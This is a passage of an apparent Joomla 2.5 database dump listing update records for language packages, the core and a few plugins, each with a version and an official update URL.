Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(153,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(154,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(155,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(156,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(157,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(158,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(159,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(160,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(161,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(162,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(163,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(164,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(165,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(166,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(167,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(168,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(169,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(170,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(171,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(172,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(173,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(174,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(175,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(176,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(177,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(178,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(179,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(180,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(181,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(182,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(183,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(184,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(185,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(186,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(187,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(188,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(189,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(190,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(191,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(192,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(193,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(194,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(195,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(196,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(197,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(198,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(199,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(200,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(201,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(202,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(203,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(204,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(205,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(206,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(207,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(208,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(209,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(210,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(211,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(212,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(213,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(214,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(215,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(216,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(217,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(218,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(219,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(220,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(221,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(222,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(223,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(224,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(225,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(226,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(227,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(228,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(229,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(230,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(231,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(232,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(233,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(234,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(235,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(236,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(237,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(238,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(239,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(240,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(241,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(242,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(243,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(244,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(245,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(246,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(247,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(248,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(249,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(250,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(251,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(252,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(253,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(254,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(255,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(256,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(257,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(258,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(259,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(260,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(261,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(262,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(263,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(264,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(265,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(266,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(267,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(268,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(269,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(270,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(271,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(272,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(273,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(274,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(275,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(276,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(277,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(278,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(279,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(280,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(281,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(282,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(283,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(284,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(285,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(286,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(287,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(288,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(289,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(290,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(291,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(292,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(293,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(294,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(295,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(296,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(297,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(298,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(299,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(300,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(301,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(302,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(303,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(304,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(305,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(306,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(307,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(308,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(309,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(310,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(311,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(312,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(313,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(314,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(315,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(316,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(317,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(318,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(319,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(320,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(321,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(322,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(323,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(324,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(325,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(326,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(327,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(328,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(329,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(330,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(331,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(332,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(333,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(334,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(335,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(336,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(337,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(338,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(339,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(340,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(341,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(342,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(343,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(344,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(345,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(346,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(347,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(348,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(349,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(350,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.6','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(351,10,0,0,'Simple Image Gallery','The best free image gallery for Joomla!','jw_simpleimagegallery','plugin','content',0,'3.0.0','','http://www.joomlaworks.net/updates/jw_sig.xml','http://forum.joomlaworks.net/extension-updates/may-27th-2013-simple-image-gallery-v3-0-0/'),(352,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(353,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(354,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(355,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(356,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(357,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(358,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(359,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(360,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(361,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(362,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(363,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(364,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(365,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(366,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(367,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(368,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(369,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(370,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(371,3,0,0,'English 